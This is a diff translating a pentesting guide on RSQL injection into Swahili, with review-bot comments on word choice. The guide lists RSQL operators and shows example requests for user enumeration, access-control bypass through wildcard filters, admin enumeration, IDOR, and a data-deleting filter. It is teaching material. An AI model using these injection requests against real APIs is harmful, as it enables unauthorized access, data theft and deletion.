Translated ['src/pentesting-web/rsql-injection.md'] to sw

Translator 2025-04-15 00:02:14 +00:00
parent 41208039ca
commit 2f24316735


@ -7,7 +7,7 @@
## RSQL Injection
## What is RSQL?
RSQL ni lugha ya kuandika maswali iliyoundwa kwa ajili ya kuchuja pembejeo kwa kutumia vigezo katika RESTful APIs. Imejengwa kwa msingi wa FIQL (Feed Item Query Language), ambayo ilitolewa awali na Mark Nottingham kwa ajili ya kuuliza Atom feeds, RSQL inajitofautisha kwa urahisi wake na uwezo wa kueleza maswali magumu kwa njia fupi na inayokubalika na URI juu ya HTTP. Hii inafanya kuwa chaguo bora kama lugha ya jumla ya maswali kwa kutafuta mwisho wa REST.
RSQL ni lugha ya kuandika maswali iliyoundwa kwa ajili ya kuchuja pembejeo kwa kutumia vigezo katika RESTful APIs. Imejengwa kwa msingi wa FIQL (Feed Item Query Language), ambayo ilitolewa awali na Mark Nottingham kwa ajili ya kuuliza Atom feeds, RSQL inajitofautisha kwa urahisi wake na uwezo wa kueleza maswali magumu kwa njia fupi na inayokubalika na URI juu ya HTTP. Hii inafanya kuwa chaguo bora kama lugha ya maswali ya jumla kwa kutafuta mwisho wa REST.
## Overview
RSQL Injection ni udhaifu katika programu za wavuti zinazotumia RSQL kama lugha ya maswali katika RESTful APIs. Kama [SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection) na [LDAP Injection](https://owasp.org/www-community/attacks/LDAP_Injection), udhaifu huu hutokea wakati vichujio vya RSQL havijasafishwa ipasavyo, ikiruhusu mshambuliaji kuingiza maswali mabaya ili kufikia, kubadilisha au kufuta data bila idhini.
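Review bot: "kutafuta mwisho wa REST" at the end of the changed line renders "REST endpoints" as "the end of REST", and the same literal choice ("mwisho wa usajili" for "registration endpoint") recurs further down this file; keep the technical term instead, e.g. "endpoint za REST" / "endpoint ya usajili", so the meaning of the sentence survives. The FIQL sentence in both the old and new line is also a comma splice ("... kwa ajili ya kuuliza Atom feeds, RSQL inajitofautisha ..."); splitting it after "Atom feeds." reads more naturally.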
@ -17,42 +17,42 @@ RSQL inakuwezesha kujenga maswali ya juu katika RESTful APIs, kwa mfano:
```bash
/products?filter=price>100;category==electronics
```
Hii inatafsiri kama ombi lililo na muundo linalochuja bidhaa zenye bei zaidi ya 100 na kundi "electronics".
Hii inatafsiri kama ombi lililo na muundo ambalo linachuja bidhaa zenye bei zaidi ya 100 na kundi "electronics".
Ikiwa programu haithibitishi ipasavyo pembejeo za mtumiaji, mshambuliaji anaweza kubadilisha chujio ili kutekeleza maombi yasiyotarajiwa, kama vile:
Ikiwa programu haitathmini ipasavyo pembejeo za mtumiaji, mshambuliaji anaweza kubadilisha chujio ili kutekeleza maombi yasiyotarajiwa, kama:
```bash
/products?filter=id=in=(1,2,3);delete_all==true
```
Or even take advantage to extract sensitive information with Boolean queries or nested subqueries.
Au hata kutumia fursa ya kutoa taarifa nyeti kwa kutumia maswali ya Boolean au subqueries zilizozungushwa.
## Risks
## Hatari
- **Ufunuo wa data nyeti:** Mshambuliaji anaweza kupata taarifa ambazo hazipaswi kupatikana.
- **Mabadiliko au kufutwa kwa data:** Kuingiza vichujio vinavyobadilisha rekodi za hifadhidata.
- **Kuongezeka kwa mamlaka:** Manipulation ya vitambulisho vinavyotoa majukumu kupitia vichujio ili kudanganya programu kwa kufikia kwa mamlaka ya watumiaji wengine.
- **Kuepuka udhibiti wa ufikiaji:** Manipulation ya vichujio ili kufikia data zilizozuiliwa.
- **Ujanja au IDOR:** Mabadiliko ya vitambulisho kati ya watumiaji kupitia vichujio vinavyoruhusu ufikiaji wa taarifa na rasilimali za watumiaji wengine bila kuthibitishwa ipasavyo kama hivyo.
## Supported RSQL operators
| Operator | Description | Example |
## Watoa huduma wa RSQL wanaoungwa mkono
| Opereta | Maelezo | Mfano |
|:----: |:----: |:------------------:|
| `;` / `and` | Logical **AND** operator. Filters rows where *both* conditions are *true* | `/api/v2/myTable?q=columnA==valueA;columnB==valueB` |
| `,` / `or` | Logical **OR** operator. Filters rows where *at least one* condition is *true*| `/api/v2/myTable?q=columnA==valueA,columnB==valueB` |
| `==` | Performs an **equals** query. Returns all rows from *myTable* where values in *columnA* exactly equal *queryValue* | `/api/v2/myTable?q=columnA==queryValue` |
| `=q=` | Performs a **search** query. Returns all rows from *myTable* where values in *columnA* contain *queryValue* | `/api/v2/myTable?q=columnA=q=queryValue` |
| `=like=` | Performs a **like** query. Returns all rows from *myTable* where values in *columnA* are like *queryValue* | `/api/v2/myTable?q=columnA=like=queryValue` |
| `=in=` | Performs an **in** query. Returns all rows from *myTable* where *columnA* contains *valueA* OR *valueB* | `/api/v2/myTable?q=columnA=in=(valueA, valueB)` |
| `=out=` | Performs an **exclude** query. Returns all rows of *myTable* where the values in *columnA* are neither *valueA* nor *valueB* | `/api/v2/myTable?q=columnA=out=(valueA,valueB)` |
| `!=` | Performs a *not equals* query. Returns all rows from *myTable* where values in *columnA* do not equal *queryValue* | `/api/v2/myTable?q=columnA!=queryValue` |
| `=notlike=` | Performs a **not like** query. Returns all rows from *myTable* where values in *columnA* are not like *queryValue* | `/api/v2/myTable?q=columnA=notlike=queryValue` |
| `<` & `=lt=` | Performs a **lesser than** query. Returns all rows from *myTable* where values in *columnA* are lesser than *queryValue* | `/api/v2/myTable?q=columnA<queryValue` <br> `/api/v2/myTable?q=columnA=lt=queryValue` |
| `=le=` & `<=` | Performs a **lesser than** or **equal to** query. Returns all rows from *myTable* where values in *columnA* are lesser than or equal to *queryValue* | `/api/v2/myTable?q=columnA<=queryValue` <br> `/api/v2/myTable?q=columnA=le=queryValue` |
| `>` & `=gt=` | Performs a **greater than** query. Returns all rows from *myTable* where values in *columnA* are greater than *queryValue* | `/api/v2/myTable?q=columnA>queryValue` <br> `/api/v2/myTable?q=columnA=gt=queryValue` |
| `>=` & `=ge=` | Performs a **equal** to or **greater than** query. Returns all rows from *myTable* where values in *columnA* are equal to or greater than *queryValue* | `/api/v2/myTable?q=columnA>=queryValue` <br> `/api/v2/myTable?q=columnA=ge=queryValue` |
| `=rng=` | Performs a **from to** query. Returns all rows from *myTable* where values in *columnA* are equal or greater than the *fromValue*, and lesser than or equal to the *toValue* | `/api/v2/myTable?q=columnA=rng=(fromValue,toValue)` |
| `;` / `and` | Opereta wa **AND** wa kimantiki. Huchuja safu ambapo *masharti yote* ni *ya kweli* | `/api/v2/myTable?q=columnA==valueA;columnB==valueB` |
| `,` / `or` | Opereta wa **OR** wa kimantiki. Huchuja safu ambapo *angalau moja* ya masharti ni *ya kweli*| `/api/v2/myTable?q=columnA==valueA,columnB==valueB` |
| `==` | Hufanya uchunguzi wa **sawa**. Inarudisha safu zote kutoka *myTable* ambapo thamani katika *columnA* ni sawa kabisa na *queryValue* | `/api/v2/myTable?q=columnA==queryValue` |
| `=q=` | Hufanya uchunguzi wa **kutafuta**. Inarudisha safu zote kutoka *myTable* ambapo thamani katika *columnA* zina *queryValue* | `/api/v2/myTable?q=columnA=q=queryValue` |
| `=like=` | Hufanya uchunguzi wa **kama**. Inarudisha safu zote kutoka *myTable* ambapo thamani katika *columnA* ni kama *queryValue* | `/api/v2/myTable?q=columnA=like=queryValue` |
| `=in=` | Hufanya uchunguzi wa **ndani**. Inarudisha safu zote kutoka *myTable* ambapo *columnA* ina *valueA* AU *valueB* | `/api/v2/myTable?q=columnA=in=(valueA, valueB)` |
| `=out=` | Hufanya uchunguzi wa **ondoa**. Inarudisha safu zote za *myTable* ambapo thamani katika *columnA* si *valueA* wala *valueB* | `/api/v2/myTable?q=columnA=out=(valueA,valueB)` |
| `!=` | Hufanya uchunguzi wa *sio sawa*. Inarudisha safu zote kutoka *myTable* ambapo thamani katika *columnA* si sawa na *queryValue* | `/api/v2/myTable?q=columnA!=queryValue` |
| `=notlike=` | Hufanya uchunguzi wa **sio kama**. Inarudisha safu zote kutoka *myTable* ambapo thamani katika *columnA* si kama *queryValue* | `/api/v2/myTable?q=columnA=notlike=queryValue` |
| `<` & `=lt=` | Hufanya uchunguzi wa **chini ya**. Inarudisha safu zote kutoka *myTable* ambapo thamani katika *columnA* ni chini ya *queryValue* | `/api/v2/myTable?q=columnA<queryValue` <br> `/api/v2/myTable?q=columnA=lt=queryValue` |
| `=le=` & `<=` | Hufanya uchunguzi wa **chini ya** au **sawa na**. Inarudisha safu zote kutoka *myTable* ambapo thamani katika *columnA* ni chini ya au sawa na *queryValue* | `/api/v2/myTable?q=columnA<=queryValue` <br> `/api/v2/myTable?q=columnA=le=queryValue` |
| `>` & `=gt=` | Hufanya uchunguzi wa **zaidi ya**. Inarudisha safu zote kutoka *myTable* ambapo thamani katika *columnA* ni zaidi ya *queryValue* | `/api/v2/myTable?q=columnA>queryValue` <br> `/api/v2/myTable?q=columnA=gt=queryValue` |
| `>=` & `=ge=` | Hufanya uchunguzi wa **sawa na** au **zaidi ya**. Inarudisha safu zote kutoka *myTable* ambapo thamani katika *columnA* ni sawa na au zaidi ya *queryValue* | `/api/v2/myTable?q=columnA>=queryValue` <br> `/api/v2/myTable?q=columnA=ge=queryValue` |
| `=rng=` | Hufanya uchunguzi wa **kuanzia hadi**. Inarudisha safu zote kutoka *myTable* ambapo thamani katika *columnA* ni sawa au zaidi ya *fromValue*, na chini ya au sawa na *toValue* | `/api/v2/myTable?q=columnA=rng=(fromValue,toValue)` |
**Note**: Table based on information from [**MOLGENIS**](https://molgenis.gitbooks.io/molgenis/content/) and [**rsql-parser**](https://github.com/jirutka/rsql-parser) applications.
**Kumbuka**: Jedwali lina msingi wa taarifa kutoka [**MOLGENIS**](https://molgenis.gitbooks.io/molgenis/content/) na [**rsql-parser**](https://github.com/jirutka/rsql-parser) programu.
#### Examples
#### Mifano
- name=="Kill Bill";year=gt=2003
- name=="Kill Bill" and year>2003
- genres=in=(sci-fi,action);(director=='Christopher Nolan',actor==*Bale);year=ge=2000
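Review bot: the new heading "## Watoa huduma wa RSQL wanaoungwa mkono" translates "operators" as "service providers", while the table header directly below it correctly uses "Opereta"; suggest "## Opereta za RSQL zinazoungwa mkono" so the heading and table agree. In the note under the table, "kutoka [MOLGENIS] na [rsql-parser] programu" has "programu" dangling at the end; "kutoka programu za [MOLGENIS] na [rsql-parser]" is the natural word order.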
@ -62,35 +62,34 @@ Or even take advantage to extract sensitive information with Boolean queries or
- genres=in=(sci-fi,action);genres=out=(romance,animated,horror),director==Que*Tarantino
- genres=in=(sci-fi,action) and genres=out=(romance,animated,horror) or director==Que*Tarantino
**Note**: Table based on information from [**rsql-parser**](https://github.com/jirutka/rsql-parser) application.
**Kumbuka**: Jedwali lina msingi wa taarifa kutoka [**rsql-parser**](https://github.com/jirutka/rsql-parser) programu.
## Common filters
These filters help refine queries in APIs:
## Vichujio vya kawaida
Vichujio hivi husaidia kuboresha maswali katika APIs:
| Filter | Description | Example |
| Kichujio | Maelezo | Mfano |
|--------|------------|---------|
| `filter[users]` | Filters results by specific users | `/api/v2/myTable?filter[users]=123` |
| `filter[status]` | Filters by status (active/inactive, completed, etc.) | `/api/v2/orders?filter[status]=active` |
| `filter[date]` | Filters results within a date range | `/api/v2/logs?filter[date]=gte:2024-01-01` |
| `filter[category]` | Filters by category or resource type | `/api/v2/products?filter[category]=electronics` |
| `filter[id]` | Filters by a unique identifier | `/api/v2/posts?filter[id]=42` |
| `filter[users]` | Huchuja matokeo kwa watumiaji maalum | `/api/v2/myTable?filter[users]=123` |
| `filter[status]` | Huchuja kwa hali (hai/siyo hai, kukamilika, nk.) | `/api/v2/orders?filter[status]=active` |
| `filter[date]` | Huchuja matokeo ndani ya kipindi cha tarehe | `/api/v2/logs?filter[date]=gte:2024-01-01` |
| `filter[category]` | Huchuja kwa aina au aina ya rasilimali | `/api/v2/products?filter[category]=electronics` |
| `filter[id]` | Huchuja kwa kitambulisho cha kipekee | `/api/v2/posts?filter[id]=42` |
## Parameta za kawaida
Parameta hizi husaidia kuboresha majibu ya API:
## Common parameters
These parameters help optimize API responses:
| Parameter | Description | Example |
| Parameta | Maelezo | Mfano |
|-----------|------------|---------|
| `include` | Includes related resources in the response | `/api/v2/orders?include=customer,items` |
| `sort` | Sorts results in ascending or descending order | `/api/v2/users?sort=-created_at` |
| `page[size]` | Controls the number of results per page | `/api/v2/products?page[size]=10` |
| `page[number]` | Specifies the page number | `/api/v2/products?page[number]=2` |
| `fields[resource]` | Defines which fields to return in the response | `/api/v2/users?fields[users]=id,name,email` |
| `search` | Performs a more flexible search | `/api/v2/posts?search=technology` |
| `include` | Inajumuisha rasilimali zinazohusiana katika jibu | `/api/v2/orders?include=customer,items` |
| `sort` | Hupanga matokeo kwa mpangilio wa kuongezeka au kupungua | `/api/v2/users?sort=-created_at` |
| `page[size]` | Inadhibiti idadi ya matokeo kwa kila ukurasa | `/api/v2/products?page[size]=10` |
| `page[number]` | Inabainisha nambari ya ukurasa | `/api/v2/products?page[number]=2` |
| `fields[resource]` | Inafafanua ni maeneo gani ya kurudishwa katika jibu | `/api/v2/users?fields[users]=id,name,email` |
| `search` | Hufanya utafutaji wa kubadilika zaidi | `/api/v2/posts?search=technology` |
## Information leakage and enumeration of users
The following request shows a registration endpoint that requires the email parameter to check if there is any user registered with that email and return a true or false depending on whether or not it exists in the database:
### Request
## Ufunuo wa taarifa na uhesabuji wa watumiaji
Ombi lifuatalo linaonyesha mwisho wa usajili ambao unahitaji parameta ya barua pepe ili kuangalia kama kuna mtumiaji yeyote aliyejiandikisha kwa barua pepe hiyo na kurudisha kweli au uongo kulingana na kama ipo katika hifadhidata:
### Ombi
```
GET /api/registrations HTTP/1.1
Host: localhost:3000
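Review bot: this hunk translates "### Request" to "### Ombi", but the "### Request" headings in the later hunks of this same file are left untouched as context, so the file ends up with a mix of "Ombi" and "Request" sub-headings; translate all of them in this commit or none of them. Minor: "hai/siyo hai" in the status filter row would normally be written "hai/si hai".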
@ -239,7 +238,7 @@ Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
```
Tena tunatumia filters na opereta maalum ambazo zitaturuhusu njia mbadala ya kupata taarifa za watumiaji na kuepuka udhibiti wa ufikiaji. Kwa mfano, chujio kwa wale *watumiaji* ambao wana herufi “*a*” katika *ID* yao ya mtumiaji:
Tena tunatumia filters na opereta maalum ambazo zitaturuhusu njia mbadala ya kupata taarifa za watumiaji na kuepuka udhibiti wa ufikiaji. Kwa mfano, chujio kwa *watumiaji* ambao wana herufi “*a*” katika *ID* yao ya mtumiaji:
### Request
```
GET /api/users?filter[users]=id=in=(*a*) HTTP/1.1
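Review bot: the changed sentence keeps the English word "filters" ("Tena tunatumia filters na opereta maalum ...") although the section heading earlier in this file uses "vichujio"; use "vichujio" here for consistency. The clause "ambazo zitaturuhusu njia mbadala ya kupata taarifa" is also missing a verb after "zitaturuhusu" ("zitaturuhusu kutumia njia mbadala ya kupata ...").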
@ -313,9 +312,9 @@ Access-Control-Allow-Origin: *
}, {
................
```
## Kuinua Haki
## Privilege Escalation
Ni uwezekano mkubwa kupata mwisho fulani ambao huangalia haki za mtumiaji kupitia jukumu lao. Kwa mfano, tunashughulika na mtumiaji ambaye hana haki:
### Ombi
### Request
```
GET /api/companyUsers?include=role HTTP/1.1
Host: localhost:3000
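Review bot: the heading "## Kuinua Haki" for "Privilege Escalation" does not match the wording the Risks list earlier in this file uses for the same concept ("Kuongezeka kwa mamlaka"); pick one term and use it in both places. The untouched context line "Ni uwezekano mkubwa kupata mwisho fulani ..." again has "mwisho" for "endpoint", so it should be fixed together with the other occurrences.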
@ -348,7 +347,7 @@ Access-Control-Allow-Origin: *
"data": []
}
```
Kwa kutumia opereta fulani tunaweza kuhesabu watumiaji wa usimamizi:
Kwa kutumia opereta fulani tunaweza kuhesabu watumiaji wa msimamizi:
### Request
```
GET /api/companyUsers?include=role&filter[companyUsers]=user.id=='94****************************' HTTP/1.1
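Review bot: the new wording "watumiaji wa msimamizi" is a possessive ("the administrator's users"), which is not what the request below does; since it filters on the role via include=role, "watumiaji wenye jukumu la msimamizi" states the intent clearly.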
@ -460,7 +459,7 @@ Access-Control-Allow-Origin: *
.......
```
## Impersonate or Insecure Direct Object References (IDOR)
Mbali na matumizi ya parameter ya `filter`, inawezekana kutumia parameters nyingine kama `include` ambayo inaruhusu kujumuisha katika matokeo parameters fulani (kwa mfano lugha, nchi, nywila...).
Mbali na matumizi ya parameter ya `filter`, inawezekana kutumia parameters nyingine kama `include` ambayo inaruhusu kujumuisha katika matokeo parameters fulani (mfano: lugha, nchi, nywila...).
Katika mfano ufuatao, taarifa za wasifu wetu wa mtumiaji zinaonyeshwa:
### Request
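Review bot: the changed line keeps "parameter"/"parameters" in English ("matumizi ya parameter ya `filter`", "parameters nyingine kama `include`") while the "Parameta za kawaida" section of this file uses "parameta"; use "parameta" here too. The heading "## Impersonate or Insecure Direct Object References (IDOR)" above it also stays in English, even though the Risks list already renders it as "Ujanja au IDOR", so it is worth translating in the same pass.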